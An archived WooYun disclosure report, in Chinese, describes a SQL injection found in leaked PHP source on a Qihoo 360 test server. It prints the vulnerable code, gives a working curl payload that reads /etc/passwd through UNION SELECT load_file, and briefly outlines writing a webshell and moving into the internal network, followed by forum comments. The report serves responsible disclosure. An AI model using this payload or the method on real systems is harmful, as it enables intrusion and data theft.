神器而已之奇虎360某站GETSHELL内网漫游到webscan了

编号122949
Urlhttp://www.wooyun.org/bug.php?action=view&id=122949
漏洞状态厂商已经确认
漏洞标题神器而已之奇虎360某站GETSHELL内网漫游到webscan了
漏洞类型成功的入侵事件
厂商奇虎360
白帽子举起手来
提交日期2015-06-26 16:47:00
公开日期2015-08-10 18:10:00
修复时间(not set)
确认时间2015-06-26 00:00:00
Confirm Spend0
漏洞标签webshell 渗透测试思路 webshell 渗透测试思路 webshell
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank20
漏洞简介
一个小问题导致的,这次不去吃饭了。漫游完再吃。妈蛋!
漏洞细节

首先是这样一个问题:
http://220.181.150.107/web.tgz
一看就是源码啊,下下来审计一下;我猜有注入:
➜ web cat web_function.php

<?php
$dir = dirname(__FILE__).'/';
require_once($dir."../db/db_function.php");
function verifyed($short_code, $token)
{
$state = NULL;
$pdo = connect2db();
if($pdo == NULL )
return 1;
$sql = sprintf("select * from receiver_reference_count where rev_jid='%s' and short_code='%s'", $token, $short_code);
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return 2;
foreach($result as $row)
{
$state = $row['state'];
}
//echo " state: ".$state;
if($state === NULL || $state === '' )
return 3;
else if($state == '0')
return 4;
return 0;
}
function get_nickname_by_short_code($short_code)
{
$jid = NULL;
$data = NULL;
$nickname = '';
$pdo = connect2db();
if($pdo == NULL )
return 1;
$sql = sprintf("select jid from short_hash_jid where short_hash = '%s'", $short_code);
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return 2;
foreach($result as $row)
{
$jid = $row['jid'];
}
//echo " state: ".$state;
if($jid === NULL || $jid === '' )
return 3;
$result = '';
$sql = sprintf("select name from ofUser where username='%s'", $jid);
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return 4;
foreach($result as $row)
{
$nickname = $row['name'];
}
//echo "name: ".$nickname.PHP_EOL;
$data = array('jid'=>$jid, 'nickname'=>$nickname);
return $data;
}
function get_play_time_by_short_code( $short_code )
{
$time = 5;
$pdo = connect2db();
if($pdo == NULL )
return $time;
$sql = sprintf("select play_time from short_hash_jid where short_hash='%s'", $short_code);
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return $time;
foreach($result as $row)
{
$time = $row['play_time'];
//echo "time:".$time.PHP_EOL;
}
if($time === NULL || $time === '' || $time === '0')
$time = 5;
return $time;
}
//echo verifyed('bXhRdzQWj1JYDmos',"13438299142" );
/*
$data = get_nickname_by_short_code("1dhg05myYabJI5CO");
if( !is_int($data))
{
print_r($data);
}else{
echo $data.PHP_EOL;
}*/
//echo get_play_time_by_short_code("QgHUkVoFE7mhSD9P");
?>


一看就是注入,但是按逻辑走着,入口在get.php

<?php
$dir = dirname(__FILE__).'/';
require_once($dir."../libs/util.php");
require_once("gen_html.php");
require_once("web_function.php");
if (isset($_COOKIE["token"]))
{
$token = $_COOKIE["token"];
}
//print_r($_COOKIE);
$query_str = isset($_SERVER['QUERY_STRING']) ? getParams($_SERVER['QUERY_STRING']) : '';
//echo "query_str: ".$query_str."<br>";
parse_str($query_str, $tmpArr);
//print_r($tmpArr);
if(isset($tmpArr['s']))
{
$short_code = $tmpArr['s'];
}
//echo "short_code: ".$short_code."<br>";
//print_r($_POST);
//////////////////////////////////////////////////////////////
//for Jump the page
$mobile = $_POST['mobile'];
$post_code = $_POST['code'];
if ($mobile != '')
{
// echo "short_code=".$post_code."mobile=".$mobile;
$ret = verifyed($post_code, $mobile);
// echo "ret == ".$ret;
if ($ret == 0)
{
setcookie("token", $mobile, time()+3600, "/", null);
response_picture_html($post_code, $mobile, $dir);
exit();
}
if ($ret == 4)
{
setcookie("token", $mobile, time()+3600, "/", null);
response_ad_html($dir, $post_code);
exit();
}
response_verify_html($post_code, $dir);
exit();
}
//////////////////////////////////////////////////////////////
//print_r($_COOKIE);
$ret = verifyed($short_code, $token);
if ($ret == 0 )
{
setcookie("token", $token, time()+3600, "/", null);
response_picture_html($short_code, $token, $dir);
exit();
}
if($ret == 4)
{
response_ad_html($dir, $short_code);
exit();
}
response_verify_html($short_code, $dir);
exit();
?>


配合这个文件

➜  web  cat gen_html.php 
<?php
$dir = dirname(__FILE__).'/';
require_once("../libs/SmartyTemplate.php");
require_once("../libs/util.php");
require_once("web_function.php");
function response_verify_html($code, $dir)
{
$tpl = 'template/verify.html.tpl';
$objSmarty = SmartyTemplate::getInstance();
$file_tpl = $dir.$tpl;
$objSmarty->assign('short_code',$code);
$url = "http://220.181.150.107/".$code.".htl";
$objSmarty->assign('thumb_src',$url);
@header('Conten-Type: text/html');
//@header('Cache-Control: no-cache, no-store, max-age=0');
@header('Cache-Control: no-cache, no-store');
@header('Pragma: no-cache');
@header('Expires: -1');
returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
}
function response_picture_html($code, $token, $dir)
{
$tpl = 'template/picture.html.tpl';
$finish_url = "http://220.181.150.107/".$code;
$counter = get_play_time_by_short_code($code);
$objSmarty = SmartyTemplate::getInstance();
$file_tpl = $dir.$tpl;
$url = "http://220.181.150.107/".$code.".htl?jid=".$token."&type=normal";
$objSmarty->assign('img_url',$url);
$objSmarty->assign('counter',$counter);
$objSmarty->assign('finish_url',$finish_url);
@header('Conten-Type: text/html');
//@header('Cache-Control: no-cache, no-store, max-age=0');
@header('Cache-Control: no-cache, no-store');
@header('Pragma: no-cache');
@header('Expires: -1');
//writeLog($file_tpl." why22222222222222", __FILE__, __LINE__, DOWNLOAD_RUN_LOG);
returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
}
function response_ad_html($dir, $short_code)
{
$tpl = 'template/ad.html.tpl';
$nickname = '';
$jid = '';

$data = get_nickname_by_short_code($short_code);
if( !is_int($data) )
{
$jid = $data['jid'];
$nickname = $data['nickname'];
//print_r($data);
}
$objSmarty = SmartyTemplate::getInstance();
//echo "nickname: ".$nickname." jid: ".$jid."<br>";
$file_tpl = $dir.$tpl;
$objSmarty->assign('nickname',$nickname);
$objSmarty->assign('jid',$jid);
@header('Conten-Type: text/html');
//@header('Cache-Control: no-cache, no-store, max-age=0');
@header('Cache-Control: no-cache, no-store');
@header('Pragma: no-cache');
@header('Expires: -1');
returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
}
?>


最后得到这样一个注入点;

curl http://220.181.150.107/web/get.php -d "mobile=13438299142' or 1=2 union select 2222222222222,1111111,0 limit 1 -- ;&code=1'  union select load_file('/etc/passwd') -- ;"


接下来,sql注入写文件,拿shell

hosts.png


内网漫游之偶遇webscan.360.cn

3689ED9B-89B5-419B-A184-3A83D7D6EA57.png


A63F1E3E-74A9-4738-90FF-FF52557F8324.png

POC

就这样吧,点到为止,shell已删。

修复方案

然并卵!

状态信息 2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-06-26: 厂商已经确认,细节仅向厂商公开
2015-07-06: 细节向核心白帽子及相关领域专家公开
2015-07-16: 细节向普通白帽子公开
2015-07-26: 细节向实习白帽子公开
2015-08-10: 细节向公众公开
厂商回复感谢您的反馈,这是台近期准备下线的测试服务器,目前我们已做下线处理。
回应信息危害等级:高漏洞Rank:20 确认时间:2015-06-26 18:09
Showing 1-61 of 61 items.
评论内容评论人点赞数评论时间

感谢您的反馈,这是台近期准备下线的测试服务器,目前我们已做下线处理。

Lonely02015-08-15 20:52:00

打脸

风炫02015-08-13 22:08:00

我也去360碰运气去了

路人毛02015-08-11 10:48:00

呵呵 360

破晓_Vampire02015-08-11 09:07:00

举起手来。这辈子可能就一次这种机会吧

明月影02015-08-10 20:24:00

大概猜到这神器怎么写的了,

Busliv02015-08-10 18:40:00

只是一个sql注入而已,找不到亮点,怎么还就打雷了?

爱梅小礼02015-07-31 18:37:00

我好久之前发的评论没了,我发的是神器就是curl,估计泄露信息被删了。。

黑暗游侠02015-07-16 19:09:00

...

玉林嘎02015-07-16 18:19:00

少侠 路径怎么得到的

scanf02015-07-12 11:03:00

标题党太严重了,为啥不处理?看来乌云眼里也容不下竞业公司哈哈

black hook02015-07-12 03:08:00

@phith0n 哈别太在意

wefgod02015-07-08 14:58:00

@phith0n 哈哈~

darker02015-07-08 13:08:00

这个是有点标题党了,看不到漫游是什么情况?

phith0n02015-07-08 12:36:00

【说个事实】360的响应时间、处理时间、以及rank发放都不错啊。

Blackeagle02015-07-08 12:08:00

呵呵,360!

残废02015-07-08 12:06:00

2015-06-26:确认测试文件存在SQL注入漏洞,成功利用后可以探测所在IDC机房的部分机器,再次对白帽子表示感谢! 给力哦

wefgod02015-06-29 12:12:00

@举起手来 兄弟有点刚啊,,再吃完饭就要下线了

小海02015-06-27 23:19:00

一说漏洞就说要下线的服务器 呵呵

围剿02015-06-27 10:10:00

nb!

秋风02015-06-27 01:37:00

漫游360了~威武!

Coffee02015-06-26 23:13:00

mark

V-King02015-06-26 23:09:00

呵呵,360! 部分!

black4yl02015-06-26 23:02:00

40rank到手 洞主爽了

Jinone02015-06-26 19:52:00

标题党,这也叫漫游内网?

Holiday002015-06-26 19:05:00

奇虎360 举起手来

90Snake02015-06-26 18:29:00

不知道在补天的话是不是标题都看不到?

心伤的胖子02015-06-26 18:18:00

5rank 少侠拿好!

Razor201202015-06-26 17:50:00

楼主的名字亮了

zeracker02015-06-26 17:49:00

表示并非搞定了webscan

mickey02015-06-26 17:48:00

我就看看

肉肉02015-06-26 17:44:00

23333

牛肉包子02015-06-26 17:39:00

赶紧0day都存起来,然后求共享

chopper02015-06-26 17:26:00

360个Rank必须有

夜鸥02015-06-26 17:23:00

坐等公开!

wy00702015-06-26 17:18:00

mark

02015-06-26 17:15:00

这漏洞提交到补天不得拿2W块钱?

qdq02015-06-26 17:13:00

关注

动后河02015-06-26 17:10:00

360个Rank值,少侠请收好。

Junkman02015-06-26 17:10:00

前排买瓜子

he1renyagao02015-06-26 17:10:00

360 啪啪!

子非海绵宝宝02015-06-26 17:09:00

叼叼

scanf02015-06-26 17:08:00

666666

M4sk02015-06-26 17:04:00

求神器!

px162402015-06-26 17:04:00

着漏洞发SRC起码3W

mango02015-06-26 17:01:00

呵呵,360

我是壮丁02015-06-26 17:00:00

................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Jumbo02015-06-26 17:00:00

呵呵,360

hkAssassin02015-06-26 16:57:00

围观

0x 8002015-06-26 16:55:00

呵呵,360

泳少02015-06-26 16:55:00

呵呵,360

Ghost丶与狼共舞02015-06-26 16:54:00

应该不会把,上次一个弱口令还给了7呢

小不点02015-06-26 16:54:00

低 5分 此问题已由其他渠道获知 感谢您的提交

天地不仁 以万物为刍狗02015-06-26 16:51:00

56rank拿好

null_z02015-06-26 16:51:00

我了擦!!!

mango02015-06-26 16:51:00

呵呵,360

kobin9702015-06-26 16:51:00

呵呵,360

淡漠天空02015-06-26 16:50:00

呵呵,360

f4ck02015-06-26 16:49:00

呵呵,360

boooooom02015-06-26 16:49:00

呵呵,360

啊L川02015-06-26 16:49:00

我了擦!!!

浩天02015-06-26 16:49:00